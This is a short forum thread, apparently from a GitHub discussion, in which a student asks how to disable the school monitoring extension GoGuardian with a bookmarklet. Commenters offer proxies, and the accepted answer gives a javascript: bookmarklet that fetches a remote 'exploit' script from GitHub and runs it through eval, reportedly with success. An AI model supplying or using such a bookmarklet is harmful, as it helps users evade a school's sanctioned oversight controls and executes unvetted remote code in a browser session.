### DISCUSSION TITLE
What bookmarklet can disable GoGuardian?

### DISCUSSION THREAD

**Discussion by krish-varshney** [3kh0/ext-remover#1292] [Help JOIN TITANIUM NETWORK TO SHARE PLEASE] [answered]
I have the ability to use bookmarklets but I can't find any specific one to use.

**Comment by ghost** [comment]
Hmmm have you tried anything? give me what you tried and I may help u

**Comment by ghost** [comment]
Or you can have some of my proxies for free :)

**Comment by ghost** [comment]
Happy to help!

**Comment by ghost** [comment]
I have goguardian too

**Comment by ghost** [comment]
BRO YOU HAVE THE ABILITY TO USE BOOKMARKLETS

**Comment by ghost** [comment]
USE EXT INSTALLER

**Comment by S-PScripts** [comment]
Does this work: javascript: onbeforeunload = (i) => 1;

**Comment by akabutnicer** [comment]
Guys, he may be able to use bookmarklets.

**Comment by krish-varshney** [comment, marked as answer]
javascript:fetch(`https://raw.githubusercontent.com/H4lyc0n/Goguardian-killer/main/Exploit_Not_The_Bookmarklet.js`).then(data=>{data.text().then(text=>{eval(text)})});

this worked

**Reply by akabutnicer** [reply]
man still lives in 2022
